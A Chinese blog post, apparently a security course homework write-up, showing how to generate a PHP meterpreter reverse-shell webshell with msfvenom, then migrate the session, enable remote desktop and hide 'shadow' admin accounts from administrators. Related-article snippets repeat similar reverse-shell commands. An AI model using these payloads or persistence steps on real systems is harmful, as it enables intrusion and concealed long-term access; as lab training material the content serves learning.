阿一网络安全课后作业之msfvemon生成php的webshell,用msf的handler连接

最新推荐文章于 2024-09-01 21:41:56 发布
最新推荐文章于 2024-09-01 21:41:56 发布
阅读量316 收藏
点赞数 2
文章标签: web安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ayixy/article/details/140767238
版权

先用msf生成php的webshell

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.129.129 LPORT=4396 -f raw -o test.php

开启handler监听

然后就成功了

后渗透中权限维持影子账户创建

Msf生成个exe文件然后反向连接

然后权限维持

getpid    # 获取当前进程的pid

ps     # 查看当前活跃进程

migrate <pid值>    #将Meterpreter会话移植到指定pid值进程中

然后开启3389远程连接直接远程登录

我们直接远程连接在本地直接创建影子账户

我们同样可以将这些账户进行隐藏,从而让管理员无法发现,达到影子账号的效果:
通过注册表的修改

然后就进去了

网安大队长阿一
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
msf生成webshell攻击服务器
afei001
03-22 978
实验环境 攻击机:kali   IP:192.168.3.157 靶机:win 10(已搭建WAMP) 生成Webshell攻击服务器 1.在kali上生成Webshell Payload root@afei:~# msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.3.157 lport=5555 -f raw > shel...
msf生成webshell_生成常用的msf
weixin_39759441的博客
12-22 732
msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:msfvenom -l生成二进制文件关于二进制文件,主要介绍适用于Windows、linux、ma...
msf生成webshell_msfwebshell 提权
weixin_39623411的博客
12-22 392
首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产...
渗透测试获取webshell方法总结
u013930899的博客
10-06 3367
本文总结了渗透测试php网站获取webshell的几种方法
kali攻防第13章 Metasploit之生成webshell及应用
安全参透之旅
12-24 6381
Metasploit之生成webshell及应用   准备工具 1、kali 系统 IP 10.10.10.131 2、受害者机子 IP 10.10.10.130 3、使用工具 Metasploit   步骤:   1、在msf生成asp脚本木马 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.
阿一鲍鱼-阿一鲍鱼1980.docx
11-25
阿一鲍鱼-阿一鲍鱼1980.docx
自动生成行为适配合同的方法及工具
理论计算机科学电子笔记229(2009)115-131www.elsevier.com/locate/entcs自动生成适配合同Jos'eAntonioMart'n1,2Deptoo.deLenguajesyCienciasdelaComputacio′nUniversityofMa′lagaM'alaga,...通过使用中间进
基于注意力蒸馏的主题场景图生成
15900基于注意力蒸馏的字幕主题场景图生成王文斌1,2,王瑞平1,2,3,陈西林1,21中国科学院智能信息处理重点实验室,中国科学院计算技术研究所,北京,1001902中国科学院大学,北京100049 3北京人工智能研究院,...
谓词归结逻辑第三版,彻底修改错误,此处特别鸣谢阿一同学的监工与验收
03-13
人工智能实验
斜拉桥与矮塔桥斜拉索安全性评估
矮塔斜拉桥斜拉索安全系数可靠性分析A B S T R A C T这项研究提供了新的见解比较斜拉桥和矮塔斜拉索的安全评估的基础上由于斜拉索的使用,这些桥梁通常被视为相同的结构针对这一误解,通过考虑超载、索损、锈蚀等...
MSF建立webshell后门,并监听端口建立session连接
热门推荐
土拨鼠挖洞中的博客
06-23 1万+
一   建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R &gt; test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
msf生成webshell_MSFWeb渗透
weixin_36212560的博客
01-13 841
WebShellroot@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.163 LPORT=3333 -f raw -o a.php 生成a.phpmsf > use exploit/multi/handlermsf exploit(handler) > set payload php/meterpr...
熟悉msfvenom生成木马程序过程,并执行和监听控制.
suixinxxx的博客
11-04 3357
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制. 二,工具:MSF 三,原理:msfvenommsfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 四,过程: 1,查看帮助 命令: root# msfvenom -h 结果: 2,生成
msf生成webshell_Metasploit 之使用socket通信的webshell简单分析
weixin_39693193的博客
12-22 339
Metasploit 之使用socket通信的webshell简单分析upload (Van Helsing) | 2013-01-08 21:530x01 前言常规的webshell都是调用该语言中常用函数来完成读取、执行等操作,从协议上来讲是采用http/https协议。但是和服务器通信还有另外一种方式:socket通信。常见的脚本语言asp,php,jsp,都可以实现对应的socket编程...
MSFVENOM学习总结
05-10 201
MSFVENOM常规选项 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以只有选对payload,再填写正确自己的IP,PORT就可以生成对应语言,对应平台的后门了!!! (- -payload-options 列出payload选项) 2. –l ...
CTF-web 第十部分 webshell基础与免杀
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
网络安全】逻辑漏洞:绕过应用程序重要功能
最新发布
等风来
09-01 237
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全】服务基础第一阶段——第八节:Windows系统管理基础---- Web服务与虚拟主机
goldfish8848的博客
08-31 1515
万维网WWW是World Wide Web的简称,也称为Web、3W等。WWW是基于客户机/服务器方式的信息发现技术和超文本技术的综合。WWW服务器通过超文本标记语言(HTML)把信息组织称为图文并茂的超文本,利用连接从一个站点跳到另一个站点。这样一来就彻底摆脱了以前查询工具只能按特定路径一步步的查找信息的限制WWW(World Wide Web,万维网)是存储在Internet计算机中数量巨大的文档的集合。这些文档称为页面,它是一种超文本(Hypertext)信息,可以用来描述超媒体。
EditPlus高效配置与使用技巧分享
此外,作者还推荐了一篇名为《“阿一web标准学堂”选修课:EditPlus高级使用技巧》的文章,该教程提供了视频、课件和代码资源,有助于进一步深化对EditPlus的理解和掌握高级功能。通过结合阅读和实践,读者能够更好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值